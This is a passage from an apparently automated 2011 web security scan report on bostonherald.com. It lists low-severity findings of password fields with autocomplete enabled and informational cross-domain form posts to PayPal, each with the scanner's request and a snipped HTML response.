Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.14. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.15. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.16. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.17. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.18. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.19. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.20. http://www.bostonherald.com/users/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

5.21. http://www.bostonherald.com/users/register/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

6. Cross-domain POST

There are 20 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


6.1. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan212009.gif" width="104" height="105">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.2. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br />
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.3. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
